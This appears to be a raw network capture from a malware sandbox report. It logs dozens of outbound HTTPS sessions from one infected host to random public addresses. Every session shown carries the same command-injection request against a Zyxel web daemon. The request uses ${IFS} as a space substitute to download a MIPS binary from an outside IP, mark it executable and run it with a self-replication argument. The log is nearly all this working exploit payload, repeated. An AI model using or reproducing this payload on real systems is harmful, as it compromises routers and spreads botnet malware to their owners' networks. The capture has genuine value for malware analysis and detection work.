                                    Jan 13, 2024 19:02:40.318011045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5873192.168.2.1359526113.116.120.222443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.318047047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5874192.168.2.1337740184.155.219.242443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.318094015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5875192.168.2.136041046.8.0.163443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.318162918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5876192.168.2.1342448130.46.197.198443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.318213940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5877192.168.2.135097641.203.43.103443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.318262100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5878192.168.2.13342464.68.104.11443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.318353891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5879192.168.2.1354584207.95.235.235443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.318427086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5880192.168.2.1351420115.164.245.202443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.318500042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5881192.168.2.1333696204.198.110.117443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.318525076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5882192.168.2.1335406130.80.178.227443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.318629980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5883192.168.2.135371454.23.213.115443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.318672895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5884192.168.2.134557093.192.19.65443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.318717003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5885192.168.2.135072866.225.90.155443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.318809986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5886192.168.2.135479423.95.123.223443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.318844080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5887192.168.2.134537264.136.211.183443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.318898916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5888192.168.2.1337062179.170.98.196443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.318973064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5889192.168.2.1354126178.23.159.70443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.319024086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5890192.168.2.1343662200.51.247.92443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.319093943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5891192.168.2.135059282.203.235.156443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.319142103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5892192.168.2.135190424.92.57.167443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.319199085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5893192.168.2.136040252.114.120.214443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.319250107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5894192.168.2.1345498104.41.26.34443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.319302082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5895192.168.2.133425824.29.232.199443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.319355965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5896192.168.2.13492824.79.50.155443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.319402933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5897192.168.2.135848887.73.7.83443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.319461107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5898192.168.2.134580619.187.182.51443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.319510937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5899192.168.2.135406473.156.149.127443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.319576979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5900192.168.2.133898879.68.48.89443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.319623947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5901192.168.2.1359038107.69.211.95443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.319694996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5902192.168.2.134473464.210.209.245443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.319767952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5903192.168.2.1350612222.120.213.169443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.319782019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5904192.168.2.1360450177.202.183.132443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.319854975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5905192.168.2.134107642.52.238.22443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.319927931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5906192.168.2.1334068138.253.90.170443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.319983959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5907192.168.2.1360260122.249.26.169443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.320038080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5908192.168.2.133812459.48.245.115443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.320082903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5909192.168.2.1352570121.134.70.140443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.320158958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5910192.168.2.1343188193.43.3.133443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.320211887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5911192.168.2.134135067.91.133.142443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.320276022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5912192.168.2.1344306200.108.107.43443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.320332050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5913192.168.2.1352736115.215.123.175443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.320398092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5914192.168.2.1348210216.247.170.79443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.320431948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5915192.168.2.1356640118.38.244.223443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.320496082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5916192.168.2.1352804173.9.248.168443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.320550919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5917192.168.2.1333032168.162.213.28443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.320586920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5918192.168.2.1340080188.34.178.180443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.320676088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5919192.168.2.135766435.172.179.50443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.320727110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5920192.168.2.134855274.176.152.187443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.320770025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5921192.168.2.1353518149.25.249.34443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.320835114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5922192.168.2.135740067.71.87.63443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.320910931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5923192.168.2.1349292159.37.185.151443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.320939064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5924192.168.2.135993470.42.132.129443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.320991039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5925192.168.2.1356596193.75.152.67443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.321057081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5926192.168.2.1352216115.129.32.135443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.321135044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5927192.168.2.135333642.14.176.131443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.321158886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5928192.168.2.135514685.87.149.149443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.321213961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5929192.168.2.134851846.76.65.40443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.321276903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5930192.168.2.1341818100.38.174.234443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.321330070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5931192.168.2.1355590122.136.171.253443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.321376085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5932192.168.2.1344606106.84.20.215443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.321438074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5933192.168.2.133497013.46.1.10443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.321489096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5934192.168.2.135424057.155.50.172443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.321563005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5935192.168.2.134348080.185.113.54443
                                    TimestampBytes transferredDirectionData
